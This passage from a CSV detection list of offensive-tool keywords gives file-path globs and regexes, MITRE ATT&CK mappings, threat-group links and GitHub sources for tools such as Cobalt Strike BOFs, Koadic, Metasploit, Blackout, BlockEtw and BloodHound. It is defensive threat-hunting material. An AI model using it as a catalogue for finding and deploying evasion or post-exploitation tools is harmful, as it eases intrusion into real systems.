- T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoin-info.nse*",".{0,1000}\/bitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoinrpc-info.nse*",".{0,1000}\/bitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitsadmin/bitsadmin.cmd*",".{0,1000}\/bitsadmin\/bitsadmin\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/BitsArbitraryFileMove*",".{0,1000}\/BitsArbitraryFileMove.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bittorrent-discovery.nse*",".{0,1000}\/bittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bjnp-discover.nse*",".{0,1000}\/bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Blackout.cpp*",".{0,1000}\/Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.exe*",".{0,1000}\/Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.git*",".{0,1000}\/Blackout\.git.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.sln*",".{0,1000}\/Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.sys*",".{0,1000}\/Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/blindeventlog.exe*",".{0,1000}\/blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*/blob/main/write_anything.c*",".{0,1000}\/blob\/main\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/block_dll_policy.exe*",".{0,1000}\/block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/BlockEtw.git*",".{0,1000}\/BlockEtw\.git.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*/BlockOpenHandle.git*",".{0,1000}\/BlockOpenHandle\.git.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*/bloodhound.md*",".{0,1000}\/bloodhound\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bloodhound.py*",".{0,1000}\/bloodhound\.py.{0,1000}","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/bloodhound/enumeration*",".{0,1000}\/bloodhound\/enumeration.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/bloodhound_domain.py*",".{0,1000}\/bloodhound_domain\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_domaintrust.py*",".{0,1000}\/bloodhound_domaintrust\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_gpo.py*",".{0,1000}\/bloodhound_gpo\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_object.py*",".{0,1000}\/bloodhound_object\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_ou.py*",".{0,1000}\/bloodhound_ou\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_schema.py*",".{0,1000}\/bloodhound_schema\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound-data*",".{0,1000}\/bloodhound\-data.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/bloodhound-quickwin.git*",".{0,1000}\/bloodhound\-quickwin\.git.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*/bloodyAD.git*",".{0,1000}\/bloodyAD\.git.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*/bluscreenofjeff/*",".{0,1000}\/bluscreenofjeff\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*/Bo0oM*",".{0,1000}\/Bo0oM.{0,1000}","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/BobTheSmuggler.git*",".{0,1000}\/BobTheSmuggler\.git.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*/bof.cpp *",".{0,1000}\/bof\.cpp\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*/bof.h",".{0,1000}\/bof\.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","160","25","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" "*/BOF.NET/*",".{0,1000}\/BOF\.NET\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*/bof.nim",".{0,1000}\/bof\.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x64.o*",".{0,1000}\/bof\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof.x86.o*",".{0,1000}\/bof\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/bof.c",".{0,1000}\/bof\/bof\.c","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/bof/bof.vcxproj*",".{0,1000}\/bof\/bof\.vcxproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 